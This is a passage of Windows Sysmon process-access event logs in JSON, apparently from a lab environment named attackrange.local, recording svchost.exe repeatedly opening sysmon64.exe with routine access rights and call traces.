C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6016,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6017,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6018,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6019,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6020,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6021,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6022,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:53.163","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6023,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:53.163\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 